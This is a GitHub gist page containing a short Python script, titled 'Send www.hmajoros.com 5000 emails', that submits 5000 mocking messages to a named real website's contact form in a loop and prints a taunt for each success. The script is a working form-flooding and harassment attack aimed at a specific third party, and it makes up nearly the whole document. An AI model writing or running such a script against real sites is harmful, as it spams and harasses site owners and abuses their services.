Last active
September 15, 2015 13:36
-
-
Save kylejfrost/c4d44b5a192d531a4384 to your computer and use it in GitHub Desktop.
Send www.hmajoros.com 5000 emails
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
for i in range(5000): | |
payload = { "name" : "133t h4x0r", "email" : "[email protected]", "message" : "wow so h4x0r3d, much fuck3d, 3hacked5me" } | |
r = requests.post("http://www.hmajoros.com/contact-submit", data=payload) | |
print "h4x0r3d" if r.status_code == 200 else "no can haz?" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment